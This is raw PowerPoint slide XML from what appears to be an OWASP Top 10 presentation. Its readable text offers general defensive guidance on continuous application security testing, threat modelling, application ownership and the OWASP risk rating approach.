                      <a:pPr marL="82800" marR="0" indent="-82800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Brian Glas</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" marR="0" indent="-82800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Neil Smithline</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" marR="0" indent="-82800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Torsten Gigler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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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2" name="Textplatzhalter 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>RC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titel 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Release Candidate</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11354688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843563236"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="7997672"/>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81000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Establish </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Continuous Application Security Testing</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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6166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aseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Building code securely is important. But it’s critical to verify that the security you intended to build is actually present, correctly implemented, and used everywhere it was supposed to be. The goal of application security testing is to provide this evidence. The work is difficult and complex, and modern high-speed development processes like Agile and DevOps have put extreme pressure on traditional approaches and tools. So we strongly encourage you to put some thought into how you are going to focus on what’s important across your entire application portfolio, and do it cost-effectively.</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900" baseline="0" dirty="0">
                        <a:latin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aseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Modern risks move quickly, so the days of scanning or penetration testing an application for vulnerabilities once every year or so are long gone. Modern software development requires </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="sng" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>continuous</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> application security testing across the entire software development lifecycle. Look to enhance existing development pipelines with security automation that doesn’t slow development. Whatever approach you choose, consider the annual cost to test, triage, remediate, retest, and redeploy a single application, multiplied by the size of your application portfolio.</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platzhalter 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>+T</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-876300" y="3248025"/>
            <a:ext cx="8763000" cy="5029200"/>
            <a:chOff x="-914400" y="2971800"/>
            <a:chExt cx="8763000" cy="5029200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-914400" y="2971800"/>
              <a:ext cx="8763000" cy="5029200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="3070641"/>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defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
                <a:t>Before you start testing, be sure you understand what’s important to spend time on. Priorities come from the threat model, so if you don’t have one, you need to create one before testing. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>Consider using </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>OWASP ASVS </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>and the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId5"/>
                </a:rPr>
                <a:t>OWASP Testing Guide </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>as an input and d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
                <a:t>on’t rely on tool vendors to decide what’s importan</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>t for your business. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Freeform 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="2974010"/>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r>
                <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0"/>
                <a:t>Understand the Threat Model</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="4085260"/>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en-US" sz="1000" kern="1200" baseline="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Your approach to application security testing must</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> be highly compatible with the people, processes, and tools you use in your software development lifecycle (SDLC). Attempts to force extra steps, gates, and reviews are likely to cause friction, get bypassed, and struggle to scale. Look for natural opportunities to gather security information and feed it back into your process.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Freeform 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="3988629"/>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kern="1200" baseline="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Understand Your SDLC</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="5099878"/>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defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>Choose the simplest, fastest, most accurate technique to verify each requirement. The </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId6"/>
                </a:rPr>
                <a:t>OWASP Security Knowledge Framework</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t> and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>OWASP Application Security Verification Standard</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t> can be great sources of functional and non-functional security requirements in your unit and integration testing. Be sure to consider the human resources required to deal with false positives from the use of automated tooling, as well as the serious dangers of false negatives.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="5003248"/>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a:t>Testing Strategies</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="6114496"/>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defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000"/>
                <a:t>You don’t have to start out testing everything. Focus on what’s important and expand your verification program over time. That means expanding the set of security defenses and risks that are being automatically verified, as well as expanding the set of applications and APIs being covered. The goal is to get to where the essential security of all your applications and APIs is verified continuously.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="6017867"/>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kern="1200" baseline="0"/>
                <a:t>Achieving Coverage</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="1" kern="1200"/>
                <a:t> and Accuracy</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="7129115"/>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en-US" sz="1000" kern="1200" baseline="0"/>
                <a:t>No matter how good</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200"/>
                <a:t> you are at testing, it won’t make any difference unless you communicate it effectively. Build trust by showing you understand how the application works. Describe clearly how it can be abused without “lingo” and include an attack scenario to make it real. Make a realistic estimation of how hard the vulnerability is to discover and exploit, and how bad that would be. Finally, deliver findings </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000"/>
                <a:t>in the tools development teams are already using, not PDF files.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="7032486"/>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a:t>Make Findings Awesome</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Titel 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What’s Next for Security Testing</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16893207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3702699696"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="8046718"/>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80999">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Start</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> Your Application Security Program Now</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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6657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aseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Applica</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>tion security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish effective processes and capabilities for securing their applications and APIs. Given the staggering amount of code in the numerous applications and APIs already </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>OWASP recommends organizations establish an application security program to gain insight and improve security across their app and API portfolio. Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, business, and executive management. Security should be visible and measurable, so that all the different players can see and understand the organization’s application security posture. Focus on the activities and outcomes that actually help improve enterprise security by eliminating or reducing risk. Key activities include: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solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFil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a:t>+O</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What’s Next for Organizations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 11"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1997374198"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-914400" y="2743200"/>
          <a:ext cx="8686800" cy="6096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285317446"/>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86050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Manage the full Application Lifecycle</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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767350">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sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Applications are some of the most complex systems humans regularly create and maintain. IT management for an application should be performed by IT specialists who are responsible for the overall IT lifecycle of an application. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="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600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>We suggest establishing application owners and application managers for every application to provide accountability, responsibility, consulted and informed (RACI). The application manager is the technical counterpart of the application owner from business perspective and manages the full application lifecycle, including the security of an application, associate data assets, and documentation. This can help with understanding who can sign off risks, who is responsible for including</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> security.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Aria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a:t>+A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What’s Next for</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Application Managers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 11"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1061340899"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-914400" y="2514600"/>
          <a:ext cx="8686800" cy="6477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698158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67367760"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="804672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81000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
                        <a:t>It’s About</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0"/>
                        <a:t> Risks, Not Weaknesses</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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665720">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sz="1000" dirty="0"/>
                        <a:t>Although the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>2007</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t> and earlier versions of the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t> focused on identifying the most prevalent “vulnerabilities,” the OWASP Top 10 has always been organized around risks. This focus on risks has caused some understandable confusion on</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> the part of people searching for an airtight weakness taxonomy. The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 for</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t> 2010</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t> clarified</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> the risk-focus in the Top 10 by being very explicit about how threat agents, attack vectors, weaknesses, technical impacts, and business impacts combine to produce risks. This version of the OWASP Top 10 continues to follow the same methodology.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>The Risk Rating methodology for the Top 10 is based on the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> For each Top 10 item, we estimated the typical risk that each weakness introduces to a typical web application by looking at common likelihood factors and impact factors for each common weakness. We then rank ordered the Top 10 according to those weaknesses that typically introduce the most significant risk to an application. These factors get updated with each new Top 10 release as things change.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
